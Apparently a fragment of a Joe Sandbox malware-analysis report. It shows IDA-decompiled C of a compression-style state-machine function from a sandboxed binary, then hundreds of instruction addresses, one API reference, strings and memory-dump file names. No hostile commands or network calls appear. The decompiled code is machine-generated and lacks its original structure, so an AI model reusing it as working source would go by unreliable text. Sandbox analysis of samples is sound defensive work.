											_a4 = 0x80;
										}
										__eflags = _t807 - 0x13;
										if(_t807 == 0x13) {
											L346:
											_t808 = 0x100;
											goto L347;
										} else {
											__eflags = _t807 - 0xe;
											if(_t807 == 0xe) {
												goto L346;
											}
											_t808 = 0;
											L347:
											asm("sbb edx, edx");
											 *((intOrPtr*)(_t831 + 0x2c)) = ( ~(_t834[1]) & 0x00000040) + _t808 + _a4 + _t834[0xf];
											__eflags = _t769;
											if(_t769 != 0) {
												L349:
												__eflags = _a8 - 4;
												if(_a8 != 4) {
													L352:
													_t761 = _v40;
													goto L320;
												}
												L350:
												__eflags = _v40;
												if(_v40 == 0) {
													_v40 = 0xfffffffb;
												}
												goto L352;
											}
											__eflags = _t796;
											if(_t796 == 0) {
												goto L350;
											}
											goto L349;
										}
									}
									 *_t834 = 0x1e;
									goto L333;
								}
								_t725 =  &_v32; // 0x415461
								_t806 =  *_t725;
								__eflags =  *_t725 - _t765[4];
								if( *_t725 == _t765[4]) {
									goto L334;
								}
								_t773 =  *_t834;
								__eflags = _t773 - 0x1d;
								if(_t773 >= 0x1d) {
									goto L334;
								}
								__eflags = _t773 - 0x1a;
								if(_t773 < 0x1a) {
									goto L331;
								}
								__eflags = _a8 - 4;
								if(_a8 == 4) {
									goto L334;
								}
								goto L331;
							case 0x1e:
								L333:
								_push(0xfffffffc);
								goto L319;
						}
					}
				}
			}

0x0042b501
0x0042b504
0x0042b50e
0x0042c5dd
0x0042c5dd
0x0042c5df
0x0042c5df
0x0042c5e0
0x0042c5e4
0x0042c5e4
0x0042b514
0x0042b519
0x0042b538
0x0042b53a
0x0042b53a
0x0042b545
0x0042b548
0x0042b54b
0x0042b54e
0x0042b551
0x0042b554
0x0042b557
0x0042b55a
0x0042b55d
0x0042b560
0x0042b563
0x0042c5d2
0x0042c5d2
0x0042c5d2
0x0042c5d7
0x00000000
0x00000000
0x0042b56b
0x00000000
0x0042b572
0x0042b575
0x0042b577
0x0042b5a3
0x0042b5a3
0x0042b5a6
0x00000000
0x00000000
0x0042b584
0x0042b588
0x00000000
0x0042b58e
0x0042b594
0x0042b597
0x0042b59b
0x0042b59d
0x0042b5a0
0x0042b5a0
0x00000000
0x0042b5a0
0x0042b588
0x0042b5a8
0x0042b5aa
0x0042b5ea
0x0042b5ea
0x0042b5ed
0x0042b5f1
0x0042b5f3
0x0042b5f5
0x0042b5f5
0x0042b5f5
0x0042b5f5
0x0042b5f9
0x0042b5fd
0x0042b68f
0x0042b692
0x00000000
0x0042b692
0x0042b60e
0x0042b610
0x0042b614
0x0042b617
0x0042b619
0x00000000
0x00000000
0x0042b61f
0x0042b621
0x0042b632
0x0042b635
0x0042b63d
0x0042b640
0x0042b643
0x0042b645
0x0042b67c
0x0042b67e
0x00000000
0x0042b680
0x0042b683
0x00000000
0x0042b683
0x0042b647
0x0042b647
0x0042b64a
0x0042b64c
0x0042b654
0x0042b657
0x0042b65c
0x0042b66a
0x0042b66d
0x0042b670
0x0042b673
0x0042b675
0x00000000
0x0042b675
0x0042b645
0x00000000
0x0042b621
0x0042b5ac
0x0042b5b2
0x00000000
0x0042b5b4
0x0042b5b4
0x0042b5be
0x0042b5c7
0x0042b5cb
0x0042b5d2
0x0042b5d7
0x0042b5da
0x0042b5dd
0x0042b5df
0x00000000
0x0042b5df
0x0042b579
0x0042b579
0x00000000
0x0042b579
0x00000000
0x0042b6bd
0x0042b6bd
0x0042b6c0
0x00000000
0x00000000
0x0042b69e
0x0042b6a2
0x00000000
0x0042b6a8
0x0042b6ab
0x0042b6ae
0x0042b6b1
0x0042b6b3
0x0042b6b5
0x0042b6b7
0x0042b6ba
0x0042b6ba
0x00000000
0x0042b6ba
0x0042b6a2
0x0042b6c2
0x0042b6c5
0x0042b6c8
0x0042b623
0x0042b626
0x00000000
0x0042b626
0x0042b6ce
0x0042b6d4
0x0042b6e5
0x0042b6e8
0x0042b6ea
0x0042b6ee
0x0042b6f1
0x0042b6f1
0x0042b6f4
0x0042b6f4
0x0042b6f6
0x0042b6fd
0x0042b6ff
0x0042b704
0x0042b707
0x0042b70b
0x0042b711
0x0042b719
0x0042b719
0x0042b71c
0x0042b71e
0x0042b720
0x00000000
0x0042b6d6
0x0042b6d6
0x0042b6d9
0x00000000
0x0042b6d9
0x00000000
0x0042b747
0x0042b747
0x0042b747
0x0042b74a
0x00000000
0x00000000
0x0042b728
0x0042b72c
0x00000000
0x00000000
0x0042b735
0x0042b738
0x0042b73b
0x0042b73d
0x0042b73f
0x0042b741
0x0042b744
0x0042b744
0x0042b744
0x0042b74c
0x0042b74f
0x0042b751
0x0042b753
0x0042b753
0x0042b756
0x0042b75d
0x0042b761
0x0042b764
0x0042b769
0x0042b76c
0x0042b76f
0x0042b774
0x0042b777
0x0042b77b
0x0042b781
0x0042b789
0x0042b789
0x0042b78c
0x0042b78e
0x0042b790
0x00000000
0x00000000
0x0042b7b7
0x0042b7b7
0x0042b7b7
0x0042b7ba
0x00000000
0x00000000
0x0042b798
0x0042b79c
0x00000000
0x00000000
0x0042b7a5
0x0042b7a8
0x0042b7ab
0x0042b7ad
0x0042b7af
0x0042b7b1
0x0042b7b4
0x0042b7b4
0x0042b7b4
0x0042b7bc
0x0042b7bf
0x0042b7c1
0x0042b7c5
0x0042b7cb
0x0042b7ce
0x0042b7d1
0x0042b7d3
0x0042b7d3
0x0042b7d6
0x0042b7d6
0x0042b7d9
0x0042b7e0
0x0042b7e2
0x0042b7e7
0x0042b7ea
0x0042b7ee
0x0042b7f4
0x0042b7fc
0x0042b7fc
0x0042b7ff
0x0042b801
0x0042b801
0x0042b803
0x00000000
0x00000000
0x0042b809
0x0042b809
0x0042b810
0x0042b89b
0x0042b89b
0x0042b89e
0x00000000
0x00000000
0x0042b87c
0x0042b880
0x00000000
0x00000000
0x0042b889
0x0042b88c
0x0042b88f
0x0042b891
0x0042b893
0x0042b895
0x0042b898
0x0042b898
0x0042b898
0x0042b8a0
0x0042b8a3
0x0042b8a6
0x0042b8a8
0x0042b8aa
0x0042b8aa
0x0042b8ad
0x0042b8b4
0x0042b8b6
0x0042b8bb
0x0042b8be
0x0042b8c2
0x0042b8c8
0x0042b8d0
0x0042b8d0
0x0042b8d3
0x0042b8d5
0x0042b821
0x0042b821
0x00000000
0x0042b821
0x0042b816
0x0042b819
0x0042b81b
0x0042b81d
0x0042b81d
0x0042b81d
0x0042b81d
0x00000000
0x00000000
0x0042b827
0x0042b827
0x0042b82e
0x0042b924
0x0042b924
0x0042b924
0x0042b924
0x0042b928
0x00000000
0x0042b928
0x0042b834
0x0042b837
0x0042b83a
0x0042b83d
0x0042b83f
0x0042b841
0x0042b841
0x0042b844
0x0042b848
0x0042b84e
0x0042b851
0x0042b853
0x0042b859
0x0042b85c
0x0042b85f
0x0042b861
0x0042b867
0x0042b86a
0x0042b86d
0x0042b872
0x0042b874
0x0042b876
0x0042b8dc
0x0042b878
0x0042b878
0x0042b878
0x0042b8e6
0x0042b8e6
0x0042b8e9
0x0042b8ee
0x0042b861
0x0042b8f1
0x0042b8f8
0x0042b90b
0x0042b90b
0x0042b90e
0x0042b911
0x0042b914
0x0042b917
0x0042b917
0x0042b917
0x0042b917
0x0042b91a
0x0042b91e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b92e
0x0042b92e
0x0042b935
0x0042b9b2
0x0042b9b5
0x0042b9b7
0x0042b9b9
0x0042b9b9
0x0042b9b9
0x0042b9b9
0x0042b9bd
0x0042b9bd
0x0042b9bd
0x0042b9bd
0x0042b9c1
0x00000000
0x0042b9c1
0x0042b937
0x0042b93b
0x00000000
0x00000000
0x0042b941
0x0042b941
0x0042b943
0x0042b943
0x0042b946
0x0042b94b
0x0042b94e
0x0042b951
0x0042b954
0x0042b956
0x0042b958
0x0042b95b
0x0042b95e
0x0042b960
0x0042b962
0x0042b965
0x0042b968
0x0042b96a
0x0042b96d
0x0042b970
0x0042b970
0x0042b970
0x0042b970
0x0042b968
0x0042b960
0x0042b973
0x0042b975
0x00000000
0x00000000
0x0042b977
0x0042b97a
0x0042b97d
0x00000000
0x00000000
0x00000000
0x0042b97d
0x0042b97f
0x0042b986
0x0042b991
0x0042b996
0x0042b99c
0x0042b99c
0x0042b99f
0x0042b9a2
0x0042b9a5
0x0042b9a8
0x0042b9aa
0x00000000
0x0042b9b0
0x00000000
0x0042b9b0
0x00000000
0x0042b9c7
0x0042b9c7
0x0042b9ce
0x0042ba4b
0x0042ba4e
0x0042ba50
0x0042ba52
0x0042ba52
0x0042ba52
0x0042ba52
0x0042ba56
0x0042ba56
0x00000000
0x0042ba56
0x0042b9d0
0x0042b9d4
0x00000000
0x00000000
0x0042b9da
0x0042b9da
0x0042b9dc
0x0042b9dc
0x0042b9df
0x0042b9e4
0x0042b9e7
0x0042b9ea
0x0042b9ed
0x0042b9ef
0x0042b9f1
0x0042b9f4
0x0042b9f7
0x0042b9f9
0x0042b9fb
0x0042b9fe
0x0042ba01
0x0042ba03
0x0042ba06
0x0042ba09
0x0042ba09
0x0042ba09
0x0042ba09
0x0042ba01
0x0042b9f9
0x0042ba0c
0x0042ba0e
0x00000000
0x00000000
0x0042ba10
0x0042ba13
0x0042ba16
0x00000000
0x00000000
0x00000000
0x0042ba16
0x0042ba18
0x0042ba1f
0x0042ba2a
0x0042ba2f
0x0042ba35
0x0042ba35
0x0042ba38
0x0042ba3b
0x0042ba3e
0x0042ba41
0x0042ba43
0x00000000
0x0042ba49
0x00000000
0x0042ba49
0x00000000
0x0042ba5c
0x0042ba5c
0x0042ba63
0x0042baa6
0x0042baa6
0x0042baa9
0x0042baab
0x0042baad
0x0042bab0
0x0042bab2
0x0042bab3
0x0042bab6
0x0042bab6
0x0042bab8
0x0042babb
0x0042babe
0x0042babe
0x0042bac1
0x0042bac6
0x0042bacb
0x0042bace
0x0042bad4
0x00000000
0x0042bad4
0x0042ba86
0x0042ba86
0x0042ba89
0x00000000
0x00000000
0x0042ba67
0x0042ba6b
0x00000000
0x00000000
0x0042ba74
0x0042ba77
0x0042ba7a
0x0042ba7c
0x0042ba7e
0x0042ba80
0x0042ba83
0x0042ba83
0x0042ba83
0x0042ba8b
0x0042ba8f
0x0042ba91
0x0042baa2
0x0042baa4
0x0042baa4
0x00000000
0x0042baa4
0x0042ba93
0x0042ba96
0x00000000
0x00000000
0x0042bafb
0x0042bafb
0x0042bafe
0x00000000
0x00000000
0x0042badc
0x0042bae0
0x00000000
0x00000000
0x0042bae9
0x0042baec
0x0042baef
0x0042baf1
0x0042baf3
0x0042baf5
0x0042baf8
0x0042baf8
0x0042baf8
0x0042bb00
0x0042bb02
0x0042bb07
0x0042bb0b
0x0042bb0e
0x0042bb12
0x0042bb15
0x0042bb18
0x0042bb1a
0x0042bb1f
0x0042bb22
0x0042bb25
0x0042bb28
0x0042bb2b
0x0042bb2d
0x0042bb2f
0x00000000
0x00000000
0x0042bb37
0x0042bb3a
0x0042bb3a
0x0042bb3e
0x0042c5e5
0x0042c5e8
0x0042c5eb
0x0042c5ee
0x0042c5f1
0x0042c5f4
0x0042c5f6
0x0042c5f9
0x0042c5fc
0x0042c5ff
0x0042c602
0x00000000
0x0042c602
0x0042bb44
0x0042bb44
0x0042bb49
0x0042bb4e
0x0042bb51
0x0042bb54
0x0042bb5a
0x00000000
0x00000000
0x0042bb60
0x0042bb60
0x0042bb64
0x00000000
0x00000000
0x0042bb6a
0x0042bb6e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042bb74
0x0042bb74
0x0042bb78
0x0042bbad
0x0042bbad
0x0042bbb0
0x00000000
0x00000000
0x0042bb8e
0x0042bb92
0x00000000
0x00000000
0x0042bb9b
0x0042bb9e
0x0042bba1
0x0042bba3
0x0042bba5
0x0042bba7
0x0042bbaa
0x0042bbaa
0x0042bbaa
0x0042bbb2
0x0042bbb4
0x0042bbb7
0x0042bbb9
0x0042bbbe
0x0042bbc1
0x0042bbc2
0x0042bbc2
0x0042bbc5
0x0042bc1c
0x0042bc22
0x0042bc22
0x0042bc25
0x0042bc26
0x00000000
0x0042bc26
0x0042bbc7
0x0042bbc7
0x0042bbc8
0x0042bbea
0x0042bbee
0x0042bbf5
0x0042bbfc
0x0042bc03
0x0042bc0a
0x0042bc10
0x00000000
0x00000000
0x0042bc12
0x0042bc15
0x0042bc16
0x00000000
0x0042bc16
0x0042bbca
0x0042bbca
0x0042bbcb
0x0042bbe2
0x0042bbcd
0x0042bbcd
0x0042bbcd
0x0042bbce
0x0042bbd0
0x0042bbd3
0x0042bbda
0x0042bbda
0x0042bbce
0x00000000
0x0042bbcb
0x0042bb7a
0x0042bb7c
0x0042bb7f
0x0042bb81
0x0042bb83
0x00000000
0x00000000
0x0042bc2c
0x0042bc2e
0x0042bc31
0x0042bc33
0x0042bc56
0x0042bc56
0x0042bc59
0x00000000
0x00000000
0x0042bc37
0x0042bc3b
0x00000000
0x00000000
0x0042bc44
0x0042bc47
0x0042bc4a
0x0042bc4c
0x0042bc4e
0x0042bc50
0x0042bc53
0x0042bc53
0x0042bc53
0x0042bc5b
0x0042bc5d
0x0042bc5f
0x0042bc61
0x0042bc66
0x0042bc69
0x0042bc6b
0x0042bc7c
0x0042bc7e
0x0042bc80
0x0042bc84
0x0042bc87
0x0042bc8d
0x00000000
0x00000000
0x00000000
0x0042bc8d
0x0042bc6d
0x0042bc70
0x00000000
0x00000000
0x0042bc93
0x0042bc93
0x00000000
0x00000000
0x0042bc99
0x0042bc99
0x0042bc9c
0x0042bc9f
0x0042bca1
0x00000000
0x00000000
0x0042bca7
0x0042bcaa
0x0042bcad
0x0042bcaf
0x0042bcaf
0x0042bcb2
0x0042bcb5
0x0042bcb8
0x0042bcba
0x0042bcba
0x0042bcbd
0x0042bcc1
0x00000000
0x0042bcc7
0x0042bcd0
0x0042bcd5
0x0042bcd8
0x0042bcdb
0x0042bcde
0x0042bce1
0x0042bce7
0x00000000
0x0042bce7
0x00000000
0x0042bd0e
0x0042bd0e
0x0042bd11
0x00000000
0x00000000
0x0042bcef
0x0042bcf3
0x00000000
0x00000000
0x0042bcfc
0x0042bcff
0x0042bd02
0x0042bd04
0x0042bd06
0x0042bd08
0x0042bd0b
0x0042bd0b
0x0042bd0b
0x0042bd15
0x0042bd18
0x0042bd1d
0x0042bd20
0x0042bd25
0x0042bd28
0x0042bd29
0x0042bd2c
0x0042bd31
0x0042bd34
0x0042bd37
0x0042bd3a
0x0042bd3d
0x0042bd44
0x0042bd47
0x0042bd5b
0x0042bd5b
0x0042bd5e
0x00000000
0x0042bd5e
0x0042bd49
0x0042bd4d
0x00000000
0x00000000
0x0042bd4f
0x0042bd53
0x00000000
0x00000000
0x0042bdac
0x0042bdac
0x0042bdac
0x0042bdaf
0x0042bdb2
0x00000000
0x00000000
0x00000000
0x00000000
0x0042bd89
0x0042bd89
0x0042bd89
0x0042bd8c
0x00000000
0x00000000
0x0042bd6a
0x0042bd6e
0x00000000
0x00000000
0x0042bd77
0x0042bd7a
0x0042bd7d
0x0042bd7f
0x0042bd81
0x0042bd83
0x0042bd86
0x0042bd86
0x0042bd86
0x0042bd8e
0x0042bd91
0x0042bd9b
0x0042bd9e
0x0042bda3
0x0042bda6
0x0042bda9
0x0042bda9
0x0042bda9
0x0042bdcb
0x0042bdcb
0x0042bdcf
0x00000000
0x00000000
0x0042bdb9
0x0042bdc1
0x0042bdc3
0x0042bdc8
0x0042bdc8
0x0042bdc8
0x0042bdc8
0x0042bdd1
0x0042bdd7
0x0042bdda
0x0042bddc
0x0042bddf
0x0042bde6
0x0042bdeb
0x0042bdf3
0x0042bdf9
0x0042be01
0x0042be04
0x0042be06
0x0042be17
0x0042be1b
0x00000000
0x0042be1b
0x0042be08
0x0042be0b
0x00000000
0x00000000
0x0042bfc4
0x0042bfc4
0x0042bfc4
0x0042bfc7
0x0042bfca
0x0042bfcd
0x00000000
0x00000000
0x00000000
0x00000000
0x0042be45
0x0042be45
0x0042be45
0x0042be4a
0x0042be4b
0x0042be4d
0x0042be51
0x0042be53
0x0042be58
0x0042be5b
0x0042be5e
0x0042be61
0x0042be63
0x00000000
0x00000000
0x0042be26
0x0042be2a
0x00000000
0x00000000
0x0042be33
0x0042be36
0x0042be39
0x0042be3b
0x0042be3d
0x0042be3f
0x0042be42
0x0042be42
0x0042be42
0x0042be67
0x0042be6a
0x0042be6e
0x0042be8a
0x0042beea
0x0042beef
0x0042bef2
0x0042bf4e
0x0042bf4e
0x0042bf51
0x0042bf53
0x00000000
0x00000000
0x0042bf2f
0x0042bf33
0x00000000
0x00000000
0x0042bf3c
0x0042bf3f
0x0042bf42
0x0042bf44
0x0042bf46
0x0042bf48
0x0042bf4b
0x0042bf4b
0x0042bf4b
0x0042bf55
0x0042bf57
0x0042bf59
0x0042bf5d
0x0042bf60
0x0042bf63
0x0042bf63
0x0042bf66
0x0042bf66
0x0042bf6a
0x0042bf6d
0x0042bf6d
0x0042bf6f
0x0042bf6f
0x0042bf72
0x0042bf75
0x0042bf78
0x0042bf7a
0x0042bf7c
0x0042bfc0
0x0042bfc0
0x0042bfc2
0x00000000
0x00000000
0x0042bfb0
0x0042bfb3
0x0042bfb7
0x0042bfb8
0x0042bfbd
0x0042bfbd
0x0042bfbd
0x0042bfbd
0x00000000
0x0042bfc0
0x0042bf7e
0x0042bf81
0x0042bf88
0x0042bf8e
0x0042bf8e
0x0042bf91
0x00000000
0x00000000
0x0042bf97
0x0042bf9f
0x0042bfe4
0x0042bfea
0x0042bfed
0x0042bfef
0x0042bff2
0x0042bff9
0x0042c001
0x0042c007
0x0042c00d
0x0042c015
0x0042c018
0x0042c01a
0x0042c02b
0x0042c02e
0x0042c030
0x0042c033
0x0042c03a
0x0042c042
0x0042c04b
0x0042c052
0x0042c05a
0x0042c05d
0x0042c05f
0x0042c070
0x0042c074
0x0042c07a
0x00000000
0x00000000
0x00000000
0x0042c07a
0x0042c061
0x0042c064
0x00000000
0x0042c064
0x0042c01c
0x0042c01f
0x00000000
0x0042c01f
0x0042bfa1
0x0042bfa4
0x00000000
0x0042bfa4
0x0042bf15
0x0042bf15
0x0042bf18
0x0042bf1a
0x00000000
0x00000000
0x0042bef6
0x0042befa
0x00000000
0x00000000
0x0042bf03
0x0042bf06
0x0042bf09
0x0042bf0b
0x0042bf0d
0x0042bf0f
0x0042bf12
0x0042bf12
0x0042bf12
0x0042bf1c
0x0042bf1e
0x0042bf20
0x0042bf24
0x0042bf27
0x0042bf2a
0x00000000
0x0042bf2a
0x0042be8e
0x0042be91
0x0042beb8
0x0042beb8
0x0042beb9
0x0042beba
0x0042bebc
0x00000000
0x00000000
0x0042be96
0x0042be9a
0x00000000
0x00000000
0x0042bea0
0x0042bea3
0x0042bea6
0x0042bea9
0x0042beab
0x0042bead
0x0042beb0
0x0042beb2
0x0042beb5
0x0042beb5
0x0042beb5
0x0042bebe
0x0042bec1
0x0042bec4
0x0042bec6
0x0042bec8
0x0042beca
0x0042bfd5
0x0042bfd8
0x00000000
0x0042bfd8
0x0042bed5
0x0042beda
0x0042bedd
0x0042bee0
0x0042bee3
0x0042bee4
0x00000000
0x0042bee4
0x0042be70
0x0042be73
0x0042be76
0x0042be79
0x0042be7b
0x0042be7d
0x0042be82
0x0042be82
0x00000000
0x00000000
0x0042c080
0x0042c080
0x00000000
0x00000000
0x0042c086
0x0042c086
0x0042c08a
0x0042c0f5
0x0042c0f5
0x0042c0f8
0x0042c0ff
0x0042c104
0x0042c107
0x0042c108
0x0042c10a
0x0042c13f
0x0042c141
0x0042c144
0x0042c147
0x0042c149
0x00000000
0x00000000
0x0042c10f
0x0042c113
0x00000000
0x00000000
0x0042c11c
0x0042c11f
0x0042c122
0x0042c124
0x0042c126
0x0042c129
0x0042c12c
0x0042c12e
0x0042c133
0x0042c134
0x0042c136
0x0042c13a
0x0042c13a
0x0042c13c
0x0042c13c
0x0042c14b
0x0042c14d
0x0042c1ec
0x0042c1ee
0x0042c1f1
0x0042c1f4
0x0042c1fa
0x0042c1fc
0x0042c1fe
0x0042c200
0x0042c203
0x0042c206
0x0042c208
0x0042c215
0x0042c217
0x0042c22b
0x0042c22d
0x0042c23e
0x0042c241
0x0042c241
0x0042c244
0x0042c247
0x00000000
0x0042c247
0x0042c22f
0x0042c232
0x00000000
0x0042c232
0x0042c219
0x0042c219
0x0042c219
0x0042c220
0x0042c220
0x00000000
0x0042c220
0x0042c20a
0x00000000
0x0042c20a
0x0042c153
0x0042c155
0x00000000
0x00000000
0x0042c15b
0x0042c15e
0x0042c162
0x0042c166
0x0042c16c
0x0042c170
0x0042c171
0x0042c173
0x0042c176
0x0042c179
0x0042c17d
0x0042c17f
0x0042c181
0x0042c183
0x0042c186
0x0042c189
0x0042c1d0
0x0042c1d2
0x0042c1d5
0x0042c1d8
0x0042c1da
0x0042c1dc
0x00000000
0x00000000
0x0042c18f
0x0042c193
0x00000000
0x00000000
0x0042c19c
0x0042c19f
0x0042c1a3
0x0042c1a6
0x0042c1a8
0x0042c1aa
0x0042c1ae
0x0042c1b0
0x0042c1b3
0x0042c1b5
0x0042c1b8
0x0042c1ba
0x0042c1bd
0x0042c1c0
0x0042c1c2
0x0042c1c4
0x0042c1c8
0x0042c1c8
0x0042c1ca
0x0042c1cd
0x0042c1cd
0x0042c1de
0x0042c1e2
0x0042c1e4
0x0042c1e4
0x0042c1e6
0x00000000
0x0042c1e6
0x0042c08c
0x0042c093
0x00000000
0x00000000
0x0042c095
0x0042c098
0x0042c09e
0x0042c0a1
0x0042c0a4
0x0042c0a7
0x0042c0aa
0x0042c0ac
0x0042c0af
0x0042c0b3
0x0042c0b6
0x0042c0b9
0x0042c0be
0x0042c0c1
0x0042c0c4
0x0042c0c7
0x0042c0ca
0x0042c0cb
0x0042c0cc
0x0042c0cf
0x0042c0d2
0x0042c0d5
0x0042c0d8
0x0042c0da
0x0042c0dd
0x0042c0e0
0x0042c0e3
0x0042c0e9
0x0042c0e9
0x00000000
0x00000000
0x0042c24d
0x0042c24d
0x0042c250
0x0042c252
0x0042c293
0x0042c293
0x0042c296
0x0042c29c
0x00000000
0x0042c29c
0x0042c254
0x0042c256
0x0042c27c
0x0042c27e
0x0042c27f
0x0042c281
0x0042c283
0x0042c286
0x0042c288
0x0042c28b
0x0042c28d
0x0042c28d
0x0042c28d
0x00000000
0x00000000
0x00000000
0x00000000
0x0042c258
0x0042c258
0x0042c258
0x0042c25c
0x00000000
0x00000000
0x0042c262
0x0042c265
0x0042c268
0x0042c26b
0x0042c26d
0x0042c26f
0x0042c272
0x0042c274
0x0042c277
0x0042c27a
0x00000000
0x00000000
0x00000000
0x0042c27a
0x00000000
0x00000000
0x0042c2a2
0x0042c2a2
0x0042c2a5
0x0042c2aa
0x0042c2ad
0x0042c2ae
0x0042c2b0
0x0042c2e5
0x0042c2e7
0x0042c2ea
0x0042c2ed
0x0042c2ef
0x00000000
0x00000000
0x0042c2b5
0x0042c2b9
0x00000000
0x00000000
0x0042c2c2
0x0042c2c5
0x0042c2c8
0x0042c2ca
0x0042c2cc
0x0042c2cf
0x0042c2d2
0x0042c2d4
0x0042c2d9
0x0042c2da
0x0042c2dc
0x0042c2e0
0x0042c2e0
0x0042c2e2
0x0042c2e2
0x0042c2f1
0x0042c2f3
0x0042c38a
0x0042c38c
0x0042c38f
0x0042c392
0x0042c398
0x0042c39a
0x0042c39c
0x0042c39e
0x0042c3af
0x0042c3b1
0x0042c3b4
0x0042c3b7
0x0042c3b7
0x0042c3ba
0x0042c3bd
0x0042c3c0
0x00000000
0x0042c3c0
0x0042c3a0
0x0042c3a3
0x00000000
0x0042c3a3
0x0042c2f9
0x0042c2fc
0x0042c300
0x0042c304
0x0042c30a
0x0042c30e
0x0042c30f
0x0042c311
0x0042c314
0x0042c317
0x0042c31b
0x0042c31d
0x0042c31f
0x0042c321
0x0042c324
0x0042c327
0x0042c36e
0x0042c370
0x0042c373
0x0042c376
0x0042c378
0x0042c37a
0x00000000
0x00000000
0x0042c32d
0x0042c331
0x00000000
0x00000000
0x0042c33a
0x0042c33d
0x0042c341
0x0042c344
0x0042c346
0x0042c348
0x0042c34c
0x0042c34e
0x0042c351
0x0042c353
0x0042c356
0x0042c358
0x0042c35b
0x0042c35e
0x0042c360
0x0042c362
0x0042c366
0x0042c366
0x0042c368
0x0042c36b
0x0042c36b
0x0042c37c
0x0042c380
0x0042c382
0x0042c384
0x0042c384
0x0042c384
0x00000000
0x00000000
0x0042c3c6
0x0042c3c6
0x0042c3c9
0x0042c3cb
0x0042c40c
0x0042c40c
0x00000000
0x0042c40c
0x0042c3cd
0x0042c3cf
0x0042c3f5
0x0042c3f7
0x0042c3f8
0x0042c3fa
0x0042c3fc
0x0042c3ff
0x0042c401
0x0042c404
0x0042c406
0x0042c406
0x0042c406
0x00000000
0x00000000
0x00000000
0x00000000
0x0042c3d1
0x0042c3d1
0x0042c3d1
0x0042c3d5
0x00000000
0x00000000
0x0042c3db
0x0042c3de
0x0042c3e1
0x0042c3e4
0x0042c3e6
0x0042c3e8
0x0042c3eb
0x0042c3ed
0x0042c3f0
0x0042c3f3
0x00000000
0x00000000
0x00000000
0x0042c3f3
0x00000000
0x00000000
0x0042c412
0x0042c412
0x0042c416
0x00000000
0x00000000
0x0042c41c
0x0042c41f
0x0042c422
0x0042c425
0x0042c427
0x0042c473
0x0042c476
0x0042c476
0x0042c478
0x0042c47b
0x0042c47e
0x0042c47e
0x0042c481
0x0042c481
0x0042c484
0x0042c486
0x0042c489
0x0042c489
0x0042c48c
0x0042c48f
0x0042c492
0x0042c492
0x0042c494
0x0042c497
0x0042c497
0x0042c49a
0x0042c49c
0x0042c49f
0x0042c4a0
0x0042c4a0
0x0042c4a0
0x0042c4a3
0x0042c4a3
0x0042c4a7
0x0042c4ab
0x00000000
0x00000000
0x00000000
0x0042c4b1
0x0042c429
0x0042c42b
0x0042c42e
0x0042c431
0x0042c44b
0x0042c44b
0x0042c44e
0x0042c451
0x0042c453
0x0042c461
0x0042c463
0x0042c463
0x0042c455
0x0042c455
0x0042c458
0x0042c45a
0x0042c45d
0x0042c45d
0x0042c465
0x0042c468
0x0042c46b
0x0042c46d
0x00000000
0x0042c46f
0x0042c46f
0x00000000
0x0042c46f
0x0042c46d
0x0042c433
0x0042c43a
0x00000000
0x00000000
0x0042c43c
0x0042c43f
0x00000000
0x00000000
0x0042c4b3
0x0042c4b7
0x00000000
0x00000000
0x0042c4bd
0x0042c4c0
0x0042c4c3
0x0042c4c6
0x0042c4c6
0x0042c4c6
0x0042c4c9
0x0042c4cb
0x0042c4cb
0x00000000
0x00000000
0x0042c4d6
0x0042c4da
0x0042c4dc
0x00000000
0x0042c58f
0x0042c593
0x0042c60a
0x0042c60a
0x00000000
0x0042c60a
0x0042c595
0x0042c599
0x00000000
0x00000000
0x0042c5b8
0x0042c5b8
0x0042c5bb
0x00000000
0x00000000
0x0042c59d
0x0042c5a1
0x00000000
0x00000000
0x0042c5a6
0x0042c5a9
0x0042c5ac
0x0042c5ae
0x0042c5b0
0x0042c5b2
0x0042c5b5
0x0042c5b5
0x0042c5b5
0x0042c5bd
0x0042c5c0
0x0042c606
0x0042c608
0x0042c608
0x00000000
0x0042c608
0x0042c5c2
0x0042c5c5
0x0042c5cc
0x0042c5cc
0x00000000
0x00000000
0x0042c610
0x0042c610
0x00000000
0x00000000
0x0042c619
0x0042c620
0x0042c620
0x0042c626
0x0042c62c
0x0042c632
0x0042c634
0x0042c637
0x0042c63a
0x0042c63e
0x0042c641
0x0042c644
0x0042c660
0x0042c660
0x0042c666
0x0042c66b
0x0042c66d
0x0042c67c
0x0042c67c
0x0042c682
0x0042c685
0x0042c688
0x0042c68b
0x0042c68e
0x0042c691
0x0042c694
0x0042c698
0x0042c69b
0x0042c69d
0x0042c69f
0x0042c6a4
0x0042c6a7
0x0042c6ab
0x0042c6ac
0x0042c6af
0x0042c6b8
0x0042c6b1
0x0042c6b1
0x0042c6b1
0x0042c6bd
0x0042c6c0
0x0042c6c3
0x0042c6c6
0x0042c69f
0x0042c6c9
0x0042c6cb
0x0042c6ce
0x0042c6d9
0x0042c6d9
0x0042c6d9
0x0042c6d0
0x0042c6d0
0x0042c6d0
0x0042c6dd
0x0042c6e0
0x0042c6eb
0x0042c6eb
0x00000000
0x0042c6e2
0x0042c6e2
0x0042c6e5
0x00000000
0x00000000
0x0042c6e7
0x0042c6f0
0x0042c6f5
0x0042c702
0x0042c705
0x0042c707
0x0042c70d
0x0042c70d
0x0042c711
0x0042c720
0x0042c720
0x00000000
0x0042c720
0x0042c713
0x0042c713
0x0042c717
0x0042c719
0x0042c719
0x00000000
0x0042c717
0x0042c709
0x0042c70b
0x00000000
0x00000000
0x00000000
0x0042c70b
0x0042c6e0
0x0042c66f
0x00000000
0x0042c66f
0x0042c646
0x0042c646
0x0042c649
0x0042c64c
0x00000000
0x00000000
0x0042c64e
0x0042c650
0x0042c653
0x00000000
0x00000000
0x0042c655
0x0042c658
0x00000000
0x00000000
0x0042c65a
0x0042c65e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042c675
0x0042c675
0x00000000
0x00000000
0x0042b56b
0x0042c5d2

APIs

_memmove.LIBCMT ref: 0042B8E9

Strings

()E, xrefs: 0042BA96
aTA, xrefs: 0042C660, 0042C685, 0042C646

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

